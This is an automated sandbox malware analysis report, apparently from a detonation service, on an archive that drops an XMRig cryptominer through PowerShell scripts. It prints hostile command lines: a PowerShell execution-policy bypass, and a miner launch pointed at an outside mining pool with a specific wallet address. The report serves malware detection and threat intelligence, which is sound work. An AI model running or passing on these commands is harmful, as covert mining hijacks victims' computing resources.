Malware Analysis Report

2025-04-19 18:46

Sample ID 240527-ar5shshf3v
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:06

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 200.131.50.23.in-addr.arpa udp

Files

memory/4144-0-0x00007FFE8A323000-0x00007FFE8A324000-memory.dmp

memory/4144-5-0x000001845F890000-0x000001845F8B2000-memory.dmp

memory/4144-7-0x00007FFE8A320000-0x00007FFE8AD0C000-memory.dmp

memory/4144-9-0x000001845FA40000-0x000001845FAB6000-memory.dmp

memory/4144-10-0x00007FFE8A320000-0x00007FFE8AD0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pt5k1ken.3mt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4144-25-0x00007FFE8A320000-0x00007FFE8AD0C000-memory.dmp

memory/4144-48-0x000001845FBC0000-0x000001845FBD2000-memory.dmp

memory/4144-61-0x000001845FA00000-0x000001845FA0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4528-90-0x000001A857140000-0x000001A857160000-memory.dmp

memory/4144-91-0x00007FFE8A323000-0x00007FFE8A324000-memory.dmp

memory/4144-92-0x00007FFE8A320000-0x00007FFE8AD0C000-memory.dmp

memory/4528-93-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4144-94-0x00007FFE8A320000-0x00007FFE8AD0C000-memory.dmp

memory/4528-95-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-96-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-97-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-98-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-99-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-100-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-101-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-102-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-103-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-104-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-105-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-106-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-107-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-108-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-109-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-110-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-111-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-112-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-113-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-114-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-115-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-116-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-117-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-118-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-119-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-120-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-121-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-122-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-123-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-124-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-125-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-126-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-127-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-128-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-129-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-130-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-131-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-132-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-133-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-134-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-135-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-136-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-137-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-138-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-139-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-140-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-141-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-142-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-143-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-144-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-145-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-146-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-147-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-148-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-149-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-150-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-151-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-152-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-153-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-154-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-155-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

memory/4528-156-0x00007FF6489D0000-0x00007FF649603000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:19

Platform

win10v2004-20240508-en

Max time kernel

1800s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
CZ 23.212.110.162:443 www.bing.com tcp
US 8.8.8.8:53 162.110.212.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp

Files

memory/1988-0-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igvesaa2.peo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1988-10-0x000001B7CB690000-0x000001B7CB6B2000-memory.dmp

memory/1988-11-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/1988-12-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/1988-14-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/1988-15-0x000001B7CBB10000-0x000001B7CBB22000-memory.dmp

memory/1988-16-0x000001B7CB6C0000-0x000001B7CB6CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3228-47-0x0000020FD6750000-0x0000020FD6770000-memory.dmp

memory/3228-48-0x0000020FD7F60000-0x0000020FD7F80000-memory.dmp

memory/3228-49-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-52-0x0000020FD7FA0000-0x0000020FD7FC0000-memory.dmp

memory/3228-51-0x0000020FD7F80000-0x0000020FD7FA0000-memory.dmp

memory/3228-50-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/1988-53-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp

memory/1988-54-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp

memory/3228-55-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-56-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-57-0x0000020FD7F80000-0x0000020FD7FA0000-memory.dmp

memory/3228-58-0x0000020FD7FA0000-0x0000020FD7FC0000-memory.dmp

memory/3228-59-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-60-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-61-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-62-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-63-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-64-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-65-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-66-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-67-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-68-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-69-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-70-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-71-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-72-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-73-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-74-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-75-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-76-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-77-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-78-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-79-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-80-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-81-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-82-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-83-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-84-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-85-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-86-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-87-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-88-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-89-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-90-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-91-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-92-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-93-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-94-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-95-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-96-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-97-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-98-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-99-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-100-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-101-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-102-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-103-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-104-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-105-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-106-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-107-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-108-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-109-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-110-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-111-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-112-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-113-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-114-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-115-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-116-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

memory/3228-117-0x00007FF79EFE0000-0x00007FF79FC13000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1760s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

